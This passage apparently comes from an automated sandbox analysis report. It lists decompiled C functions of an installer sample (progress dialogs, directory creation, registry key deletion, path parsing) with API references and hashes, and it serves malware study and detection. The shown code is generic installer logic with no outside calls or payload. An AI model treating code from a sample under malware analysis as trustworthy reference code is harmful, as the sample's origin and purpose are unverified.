				__eflags = _t6 -  *0x423f8c;
				if(_t6 >  *0x423f8c) {
					__eflags =  *0x423f88;
					if( *0x423f88 == 0) {
						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
						 *0x41712c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424034 & 0x00000001;
					if(( *0x424034 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BCD());
						return E00404FE7(0,  &_v68);
					}
				}
				return _t6;
			}







                                              0x00402bf5
                                              0x00402bf7
                                              0x00402bfe
                                              0x00402c01
                                              0x00402c01
                                              0x00402c07
                                              0x00000000
                                              0x00402c07
                                              0x00402c0f
                                              0x00402c15
                                              0x00000000
                                              0x00402c18
                                              0x00402c1f
                                              0x00402c25
                                              0x00402c2b
                                              0x00402c2d
                                              0x00402c33
                                              0x00402c71
                                              0x00402c7a
                                              0x00000000
                                              0x00402c7f
                                              0x00402c35
                                              0x00402c3c
                                              0x00402c4d
                                              0x00000000
                                              0x00402c5b
                                              0x00402c3c
                                              0x00402c87

                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402C01
                                              • GetTickCount.KERNEL32 ref: 00402C1F
                                              • wsprintfA.USER32 ref: 00402C4D
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C7F
                                                • Part of subcall function 00402BCD: MulDiv.KERNEL32(0001DA6B,00000064,?), ref: 00402BE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 722711167-2449383134
                                              • Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                              • Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
                                              • Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                              • Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004048B6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                              0x004048c4
                                              0x004048d1
                                              0x004048d7
                                              0x00404915
                                              0x00404915
                                              0x00404924
                                              0x0040492b
                                              0x00000000
                                              0x0040492d
                                              0x004048d9
                                              0x004048e8
                                              0x004048f0
                                              0x004048f3
                                              0x00404905
                                              0x0040490b
                                              0x00404912
                                              0x00000000
                                              0x00404912
                                              0x00000000

                                              APIs
                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048D1
                                              • GetMessagePos.USER32 ref: 004048D9
                                              • ScreenToClient.USER32 ref: 004048F3
                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404905
                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040492B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                              • Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
                                              • Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                              • Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402B51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BCD();
					_t19 = "unpacking data: %d%%";
					if( *0x423f90 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                              0x00402b5e
                                              0x00402b6c
                                              0x00402b72
                                              0x00402b72
                                              0x00402b80
                                              0x00402b82
                                              0x00402b8e
                                              0x00402b93
                                              0x00402b95
                                              0x00402b95
                                              0x00402ba0
                                              0x00402bb0
                                              0x00402bc2
                                              0x00402bc2
                                              0x00402bca

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                              • API String ID: 1451636040-1158693248
                                              • Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                              • Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
                                              • Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                              • Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004054A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004054A9(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407310;
				_v36.Group = 0x407310;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407300;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                              0x004054b4
                                              0x004054b8
                                              0x004054bb
                                              0x004054c1
                                              0x004054c5
                                              0x004054c9
                                              0x004054d1
                                              0x004054d8
                                              0x004054de
                                              0x004054e5
                                              0x004054f4
                                              0x004054f6
                                              0x00000000
                                              0x004054f6
                                              0x00405500
                                              0x00405507
                                              0x0040551d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040551f
                                              0x00405523

                                              APIs
                                              • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
                                              • GetLastError.KERNEL32 ref: 00405500
                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
                                              • GetLastError.KERNEL32 ref: 0040551F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 3449924974-1246513382
                                              • Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                              • Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
                                              • Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                              • Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402A4C Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A4C(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406087(4);
					if(_t27 == 0) {
						if( *0x424030 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x424030, 0);
				}
				return _t18;
			}








                                              0x00402a6d
                                              0x00402a75
                                              0x00402a9d
                                              0x00402a87
                                              0x00402ad7
                                              0x00402add
                                              0x00000000
                                              0x00402adf
                                              0x00402a9b
                                              0x00000000
                                              0x00000000
                                              0x00402a9b
                                              0x00402ab2
                                              0x00402aba
                                              0x00402ac1
                                              0x00402aed
                                              0x00000000
                                              0x00000000
                                              0x00402af5
                                              0x00402afd
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402afd
                                              0x00000000
                                              0x00402ad0
                                              0x00402ae4

                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
                                              • RegCloseKey.ADVAPI32(?), ref: 00402AB2
                                              • RegCloseKey.ADVAPI32(?), ref: 00402AD7
                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Close$DeleteEnumOpen
                                              • String ID:
                                              • API String ID: 1912718029-0
                                              • Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                              • Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
                                              • Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                              • Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                              0x00401ccb
                                              0x00401cd2
                                              0x00401d01
                                              0x00401d09
                                              0x00401d10
                                              0x00401d10
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                              • GetDlgItem.USER32 ref: 00401CC5
                                              • GetClientRect.USER32 ref: 00401CD2
                                              • LoadImageA.USER32 ref: 00401CF3
                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                              • DeleteObject.GDI32(00000000), ref: 00401D10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                              • Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
                                              • Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                              • Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405882 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00405882(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405634
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405819(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                              0x0040588b
                                              0x0040588b
                                              0x00405892
                                              0x00405895
                                              0x0040589a
                                              0x004058ad
                                              0x004058c7
                                              0x00000000
                                              0x004058c7
                                              0x004058b1
                                              0x004058b2
                                              0x004058b5
                                              0x004058b6
                                              0x004058be
                                              0x00000000
                                              0x00000000
                                              0x004058c0
                                              0x004058c3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004058c3
                                              0x00000000
                                              0x004058a3
                                              0x00000000
                                              0x004058a4

                                              APIs
                                              • CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405890
                                              • CharNextA.USER32(00000000), ref: 00405895
                                              • CharNextA.USER32(00000000), ref: 004058A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CharNext
                                              • String ID: 4V@$C:\
                                              • API String ID: 3213498283-1503405514
                                              • Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                              • Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
                                              • Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                              • Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004047AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
			}



















                                              0x004047b2
                                              0x004047b7
                                              0x004047bf
                                              0x004047c0
                                              0x004047cd
                                              0x004047d5
                                              0x004047d6
                                              0x004047d8
                                              0x004047da
                                              0x004047dc
                                              0x004047df
                                              0x004047df
                                              0x004047e6
                                              0x004047ec
                                              0x004047ec
                                              0x004047f3
                                              0x004047fa
                                              0x004047fd
                                              0x00404800
                                              0x00404800
                                              0x00404804
                                              0x00404814
                                              0x00404816
                                              0x00404819
                                              0x004047c2
                                              0x004047c2
                                              0x004047c9
                                              0x004047c9
                                              0x00404821
                                              0x0040482c
                                              0x00404842
                                              0x00404852
                                              0x0040486e

                                              APIs
                                              • lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                              • wsprintfA.USER32 ref: 00404852
                                              • SetDlgItemTextA.USER32 ref: 00404865
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                              • Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
                                              • Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                              • Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 51%
                                              			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E004029EF(3);
				 *(_t55 + 8) = E004029EF(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A0C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A0C();
					_t28 = E00402A0C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EF();
					_t37 = E004029EF();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C59();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                              0x00401bb6
                                              0x00401bc2
                                              0x00401bc5
                                              0x00401bce
                                              0x00401bce
                                              0x00401bd1
                                              0x00401bd5
                                              0x00401bde
                                              0x00401bde
                                              0x00401be1
                                              0x00401be5
                                              0x00401be7
